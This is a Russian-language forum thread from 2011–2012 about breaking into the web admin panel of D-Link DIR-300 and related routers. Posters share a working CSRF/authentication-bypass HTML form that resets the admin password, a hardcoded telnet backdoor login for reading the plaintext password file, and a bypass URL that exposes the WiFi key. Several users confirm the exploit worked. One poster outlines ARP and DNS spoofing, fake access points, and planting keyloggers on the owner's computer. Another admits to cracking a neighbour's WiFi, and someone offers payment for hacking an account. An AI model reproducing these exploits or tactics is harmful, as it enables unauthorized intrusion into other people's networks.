Взлом пароля веб морды D-LINK dir-300
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Взлом пароля веб морды D-LINK dir-300 - 2011-07-11 22:25:45.770000
|
|
|
hgfss
Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333
|
Читал про уязвимость в dir-300,320,600 POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 помогите реализовать делал все как указано в статье http://nichtdozen.mybb2.ru/viewtopic.php?p=9086 ответ получил "Only the admin account can change the settings." прошивка роутера 2,05 Bx помогите реализовать или подскажите как по другому попасть в веб интерфейс
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-09-16 00:29:00.886666
|
|
|
vetieslav
Сообщений: 1
Оценки: 0
Присоединился: 2011-09-16 00:06:19.420000
|
В cmd или через putty (выбираешь тип подключения telnet) telnet 192.168.1.1 login: Alphanetworks password: wrgn23_dlwbr_dir300b cd /var/etc cat httpasswd В результате видим логин/пароль веб-морды в открытом виде
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-09-16 06:56:09.810000
|
|
|
zzsnn
Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
|
Обычно пароль у D-Link, если не меняли "admin" и пароль такой же, "admin".
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-06 01:54:19.740000
|
|
|
hgfss
Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333
|
порт закрыт:@:@
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-27 22:39:23.690000
|
|
|
SWG
Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333
|
D-Link DIR-300 CSRF Vuln (Change Admin Account Settings)
<!--
[+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit
[+] Desсriрtion: Enable Remote Menagement for specific IP
[+] Firmware Version: 1.04
[+] Note: No need administrator to be logged (:
[+] Author: outlaw.dll
[+] Date: 17.12.2010
[+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS
This firmware version is full of CSRF and other type of vulnerabilities.
W_o.O_W
-->
<form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post">
<input type="hidden" name="ACTION_POST" value="1" />
<input type="hidden" name="admin_name" value="outlaw.dll" />
<input type="hidden" name="admin_password1" value="1337" />
<input type="hidden" name="admin_password2" value="1337" />
<input type="hidden" name="rt_enable_h" value="1" />
<input type="hidden" name="rt_port" value="8080" />
<input type="hidden" name="rt_ipaddr" value="192.168.0.1337" />
</form>
<sсriрt>document.exploit.submit();</sсriрt> Не помню, можно ли так посмотреть пароль админа, но пароль от WiFi узнать можно, проверялось на DIR-320: http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-28 15:01:30.840000
|
|
|
hgfss
Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333
|
quote:
ORIGINAL: SWG D-Link DIR-300 CSRF Vuln (Change Admin Account Settings)
<!--
[+] Title: D-Link DIR-300 CSRF Vuln. (Change Admin Account Settings) PoC Exploit
[+] Desсriрtion: Enable Remote Menagement for specific IP
[+] Firmware Version: 1.04
[+] Note: No need administrator to be logged (:
[+] Author: outlaw.dll
[+] Date: 17.12.2010
[+] Tested on: Windows 7 Ultimate (Google Chrome) but will work in any other OS
This firmware version is full of CSRF and other type of vulnerabilities.
W_o.O_W
-->
<form name="exploit" action="http://server/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" method="post">
<input type="hidden" name="ACTION_POST" value="1" />
<input type="hidden" name="admin_name" value="outlaw.dll" />
<input type="hidden" name="admin_password1" value="1337" />
<input type="hidden" name="admin_password2" value="1337" />
<input type="hidden" name="rt_enable_h" value="1" />
<input type="hidden" name="rt_port" value="8080" />
<input type="hidden" name="rt_ipaddr" value="192.168.0.1337" />
</form>
<sсriрt>document.exploit.submit();</sсriрt> Не помню, можно ли так посмотреть пароль админа, но пароль от WiFi узнать можно, проверялось на DIR-320: http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 прошивка 2,05 Bx а не 1,04 - этот пост не пойдет, а пароль админа скрыт звездами
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-28 20:32:43.886666
|
|
|
SWG
Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333
|
quote:
пароль админа скрыт звездами * Попробуй посмотреть исходник страницы (на linksys wrt54gl dd-wrt такое получалось) * Возможно у тебя получиться скопировать конфиг роутера используя уязвимость http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 на базе нее построена и предыдущая уязвимость. * Попробуй сниффером перехватить пароль, когда кто-то зайдет на роутер под аккаунтом админа.
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-28 20:50:03.670000
|
|
|
hgfss
Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333
|
quote:
ORIGINAL: SWG quote:
пароль админа скрыт звездами * Попробуй посмотреть исходник страницы (на linksys wrt54gl dd-wrt такое получалось) * Возможно у тебя получиться скопировать конфиг роутера используя уязвимость http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 на базе нее построена и предыдущая уязвимость. * Попробуй сниффером перехватить пароль, когда кто-то зайдет на роутер под аккаунтом админа. исходник весь перерыл, ни чего интерестного там нет… конфиг роутера тож не копируется(выкидывает на страницу типа–Only the admin account can change the settings) под аккаунтом админа заходят с лана, а я по wi-fi подключаюсь т.е. пакеты я могу перехватить только wi-fi Еще догадки…???
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-10-29 12:10:16.860000
|
|
|
SWG
Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333
|
Теоретически ты можешь провести : * ARP-spoofing атаку, чтобы перехватить трафик между роутером и клиентом. * DNS-spoofing атаку, чтобы перенаправить жертву на свой фейковый WEB-интерфейс вместо какого-то сайта. * Сделать так, чтобы зайшли на WEB-интерфейс по WiFi (положить WiFi сеть и ждать, когда зайдут по WiFi на WEB-интерфейс чтобы посмотреть в чем проблема или какие-то другие варианты) А практически ты можешь : * Взломать компьютер человека, который имеет админ-доступ к роутеру чтобы залить ему key-logger, покопаться в кешах браузеров на наличие пароля к роутеру или покопаться в ФС на наличие файла с паролем. * Создать фейковую WiFi точку доступа с копией WEB-интерфейса роутера, переключить на нее всех WiFi пользователей и ждать, пока кто нибудь позовет админа роутера, чтобы посмотреть, почему у них не работает интернет. —- Вопрос : для какой цели тебе нужен пароль от роутера ? —- Возможно еще поможет программа : RouterPassView (for Win32) для просмотра пароля админа (лично ею не пользовался, не знаю как работает, читает ли она конфиг или с исходника достает)
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-01 02:33:08.426666
|
|
|
m.ksy
Сообщений: 4
Оценки: 0
Присоединился: 2011-11-01 02:27:29.176666
|
quote:
ORIGINAL: hgfss Читал про уязвимость в dir-300,320,600 POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 помогите реализовать делал все как указано в статье http://nichtdozen.mybb2.ru/viewtopic.php?p=9086 ответ получил "Only the admin account can change the settings." прошивка роутера 2,05 Bx помогите реализовать или подскажите как по другому попасть в веб интерфейс а можно подробнее о POST-запросе - я никаких запросов никогда не делал и не представляю, как это реализовать, может у меня получится 8|
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-01 02:42:48.743333
|
|
|
m.ksy
Сообщений: 4
Оценки: 0
Присоединился: 2011-11-01 02:27:29.176666
|
quote:
ORIGINAL: SWG —- Вопрос : для какой цели тебе нужен пароль от роутера ? —- у меня, например, в целях узнать пароль, что бы сделать перенаправление портов, тоисть, что б используя внешний ІР(он статический) можно было в интернете зайти в настройки роутера, и используя ?NO_NEED_AUTH=1&AUTH_GROUP=0 можно было бы посмотреть пароль точки доступа.
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-02 00:47:22.860000
|
|
|
m.ksy
Сообщений: 4
Оценки: 0
Присоединился: 2011-11-01 02:27:29.176666
|
все, понял как делать запросы, пароль поменялся с первой же попытки. правда написало "настройки не изменены", но все же пароль изменился :)
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-02 02:47:47.186666
|
|
|
SWG
Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333
|
quote:
ORIGINAL: m.ksy все, понял как делать запросы, пароль поменялся с первой же попытки. правда написало "настройки не изменены", но все же пароль изменился :) Ну вот и отпишись : * Модель роутера * Версия ПО * Пример запроса
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-02 11:51:47.950000
|
|
|
m.ksy
Сообщений: 4
Оценки: 0
Присоединился: 2011-11-01 02:27:29.176666
|
DIR-300 1.04
<form action="http://192.168.0.1:80/tools_admin.php" method="POST">
<input type="hidden" name="ACTION_POST" value="LOGIN">
<input type="hidden" name="LOGIN_USER" value="a">
<input type="hidden" name="LOGIN_PASSWD" value="b">
<input type="hidden" name="login" value="+Log+In+">
<input type="hidden" name="NO_NEED_AUTH" value="1">
<input type="hidden" name="AUTH_GROUP" value="0">
<input type="hidden" name="admin_name" value="admin">
<input type="hidden" name="admin_password1" value="admin">
<input type="submit">
</form>
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-04 00:27:59.080000
|
|
|
hgfss
Сообщений: 13
Оценки: 0
Присоединился: 2011-07-11 22:14:43.143333
|
да, спасибо за советы… ARP-spoofing атаку произвести можно, но насколько я знаю админ по вафле заходить не будет т.к. не имеет таковой… DNS-spoofing атаку мороки много-опыта мало:(( пока не могу опробывать т.к. точка пропала, видать вырубили её… а пароль был нужен для открытия портов на мой локал ип, и для изменения канала вафли встал другой вопрос по поводу веб морды тока другого роутера- ZTE M-200 B нужно достать пасс вебки если не напряжно подскажи плиз
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-05 21:02:32.470000
|
|
|
SWG
Сообщений: 29
Оценки: 0
Присоединился: 2006-10-13 23:32:20.163333
|
quote:
ORIGINAL: hgfss да, спасибо за советы… ARP-spoofing атаку произвести можно, но насколько я знаю админ по вафле заходить не будет т.к. не имеет таковой… DNS-spoofing атаку мороки много-опыта мало:(( пока не могу опробывать т.к. точка пропала, видать вырубили её… а пароль был нужен для открытия портов на мой локал ип, и для изменения канала вафли встал другой вопрос по поводу веб морды тока другого роутера- ZTE M-200 B нужно достать пасс вебки если не напряжно подскажи плиз Ты меня неправильно понял, читай : http://forum.xakep.ru/m_2563141/tm.htm
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-08 14:27:27.526666
|
|
|
strikazloids
Сообщений: 1
Оценки: 0
Присоединился: 2011-11-08 14:19:53.240000
|
Доброго всем дня в продолжение данной тему хотел бы спросить .проблема такая , есть модем D-link dir -400 версия по 1.00 , забыл на него пароль для доступа к веб интерфейсу . Доступ есть только с логина User . Как можно просмотреть пароль admin без сброса настроек модема . заранее спс . также вот исходный код страницы смены пароля <h1>ADMINISTRATOR SETTINGS</h1> <p>There is password for this router by default. To help secure your network, we recommend that you should choose a new password.</p> <br> <input name="button" type="submit" class=button_submit value="Save Settings" onClick="return send_request()"> <input name="button" type=reset class=button_submit value="Don't Save Settings" onclick="page_cancel('form1', 'tools_admin.asp');"> </div> <div class="box"> <h2>Administrator (The default Login Name is "admin") : </h2> <table cellpadding="1" cellspacing="1" border="0" width="525"> <tr> <td width="180" align="right">Login name :</td> <td width="368"><font face=Arial size=2> <input type="text" id="admin_username" name="admin_username" size=20 maxlength=15 value="admin"> </font></td> </tr> <tr> <td width="180" align="right">New Password :</td> <input type="hidden" id="admin_password" name="admin_password" value="WDB8WvbXdHtZyM8Ms2RENgHlacJghQyG"> <td width="368"><font face=Arial size=2> <input type=password id="admin_password1" name="admin_password1" size=20 maxlength=15 value="WDB8WvbXdH" onChange="key_word(this,'admin_password');"> </font></td> </tr> <tr> <td width="180" align="right">Confirm Password :</td> <td width="368"><font face=Arial size=2> <input type=password id=admPass2 name=admPass2 size=20 maxlength=15 value="WDB8WvbXdH"> </font> </td> </tr> </table> </div> <div class="box">
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-09 10:14:21.326666
|
|
|
eddiblatniakov666
Сообщений: 1
Оценки: 0
Присоединился: 2011-11-09 10:10:32.986666
|
такой вопрос взломал вай фай точку веп шифрования… соседа.. но вот беда пасс и логин на роутер не подходят стандартный …admin admin типо.. можно ли как либо их узнать.. мне надо для того чтобы порты расшаривать для прог!!
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-09 14:13:56.796666
|
|
|
Trimox
Сообщений: 42
Оценки: 0
Присоединился: 2011-10-06 16:53:51.090000
|
Пойди и спроси у соседа ;)
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-11-13 00:16:23.723333
|
|
|
Gosatch
Сообщений: 6
Оценки: 0
Присоединился: 2011-11-12 23:52:43.806666
|
Внимание! нужен срочно взлом аккаунта на usde.biz! вознаграждение гарантируется! писать в личку
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-12-06 14:12:15.790000
|
|
|
toshyak
Сообщений: 2
Оценки: 0
Присоединился: 2011-12-06 13:34:55.006666
|
Тоже не очень понял про POST-запрос. Пытался и через консоль послать и через Putty. В консоли пишет "Connection closed by foreign host", а Putty закрывается через примерно минуту, даже не успеваю ничего толком отправить. Но я совсем не уверен, что все правильно делаю( На 80 порт надо открывать соединение или другой какой-то? quote:
ORIGINAL: m.ksy
<form action="http://192.168.0.1:80/tools_admin.php" method="POST">
<input type="hidden" name="ACTION_POST" value="LOGIN">
<input type="hidden" name="LOGIN_USER" value="a">
<input type="hidden" name="LOGIN_PASSWD" value="b">
<input type="hidden" name="login" value="+Log+In+">
<input type="hidden" name="NO_NEED_AUTH" value="1">
<input type="hidden" name="AUTH_GROUP" value="0">
<input type="hidden" name="admin_name" value="admin">
<input type="hidden" name="admin_password1" value="admin">
<input type="submit">
</form> не понял, что c этим делать, как это отправлять и куда?
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2011-12-08 14:08:26.270000
|
|
|
toshyak
Сообщений: 2
Оценки: 0
Присоединился: 2011-12-06 13:34:55.006666
|
Все, разобрался что делать, спасибо m.ksy Просто создаете текстовый файлик с текстом запроса, сохраняете в html формате и открываете в браузере. Там будет одна кнопка, ее нажимаете и логин/пароль на роутере меняются на admin/admin
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2012-02-08 22:39:49.756666
|
|
|
1C_ProgMan
Сообщений: 1
Оценки: 0
Присоединился: 2012-02-08 21:58:38.466666
|
парни, помогите решить проблему: забыл пароль на dir-300nru-b5 … перепробовал все перечисленные здесь варианты - не получилось ничего(( пробовал RouterPassView (имеется бэкап настроек) - не помогла программка, она может прочитать только BIN файлы… а новый dir-300nru сохраняет теперь в другом формате( ресет - хотелось бы оставить как самый последний вариант, уж очень не хотса все перенастраивать(
|
|
|
RE: Взлом пароля веб морды D-LINK dir-300 - 2012-04-09 00:19:05.030000
|
|
|
ivo83
Сообщений: 1
Оценки: 0
Присоединился: 2012-04-09 00:14:53.660000
|
quote: ORIGINAL: m.ksy <form action="http://192.168.0.1:80/tools_admin.php" method="POST"> <input type="hidden" name="ACTION_POST" value="LOGIN"> <input type="hidden" name="LOGIN_USER" value="a"> <input type="hidden" name="LOGIN_PASSWD" value="b"> <input type="hidden" name="login" value="+Log+In+"> <input type="hidden" name="NO_NEED_AUTH" value="1"> <input type="hidden" name="AUTH_GROUP" value="0"> <input type="hidden" name="admin_name" value="admin"> <input type="hidden" name="admin_password1" value="admin"> <input type="submit"> </form> на DIR-300 Hardware Version : B1 Firmware Version : 2.04 СРАБОТАЛО!
|
|
|
|
|